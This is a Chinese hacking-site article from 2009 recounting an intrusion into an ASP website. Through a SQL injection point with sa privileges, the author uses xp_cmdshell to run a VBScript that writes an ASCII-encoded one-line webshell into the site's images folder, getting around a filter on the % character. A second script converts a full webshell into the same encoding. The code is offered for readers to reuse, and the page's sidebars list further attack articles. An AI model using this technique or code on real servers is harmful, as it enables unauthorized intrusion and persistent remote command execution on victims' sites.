首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
对%无法写入的一次突破
来源:vfocus.net 作者:孤水绕城 发布时间:2009-11-17  

来源:孤水绕城

今天和小猪一起搞站,asp脚本的一个sa权限的注入点,可是在echo一句话小马的时候出现了问题。%%以及里面的内容被过滤了。shell传不上去。ftp传不了,vbs下载也没有成功。不知道是%被过滤了,还是是被web防火墙拦截了。最后想了下,用vbs写了一个脚本。

脚本内容如下:

echo Dim str:str="60 37 69 120 101 99 117 116 101 71 108 111 98 97 108 32 114 101 113 117 101 115 116 40 34 49 34 41 37 62":>c:\孤水绕城.vbs
echo Set fso=CreateObject("Scripting.FileSystemObject"):Set otfuser=fso.OpenTextFile("D:\Ittms-Web\common\images\shell.asp",2,true):For i = 0 To UBound(Split(str, Chr(32))):otfuser.write(Chr(Split(str, Chr(32))(i))):Next >>c:\孤水绕城.vbs

其中str为 <%ExecuteGlobal request("1")%>的asc码的形式。

传到服务器上,然后用xp——cmdshell执行cscript write.vbs结果成功的将一句话木马写入到了D:\Ittms-Web\common\images\目录中

然后我们再将大马转码一下然后赋值给str就行了,传到服务器中,直接运行就ok了。

转换成asc码的代码如下:

Set fso=CreateObject("Scripting.FileSystemObject"):
Set otfuser=fso.OpenTextFile("shell.asp",1,false):
Set savetext = fso.OpenTextFile("encode.txt",2,false):
Dim retstr
Dim readstr
Do While otfuser.AtEndOfLine <> True
readstr=otfuser.readline()
retstr = retstr&Str2Asc(readstr)&Asc(vbcrlf)&" "
Loop
savetext.write Trim(retstr)
Function Str2Asc(str)'sql的16进制转换函数
Dim s
For i = 1 To Len(str)
s = s & Asc(Mid(str,i,1))&Chr(32)
NExt
Str2Asc = s
End Function

很简单的一个脚本,大家根据实际情况,活学活用吧。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·实现完整的XSS wrom流程
·如何攻击windows域
·139邮箱蠕虫编写实例
·突破防篡改 继续上传
·一类特殊的登录验证sql注入玩法-
·利用MYSQL安全检测FreeBSD服务器
·利用 PHP 扩展模块突破 Disable_
·南方数据拿shell总结
·MSN Editor 漏洞
·如何渗透域
·如何使用MySQL提升权限
·unix入侵
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved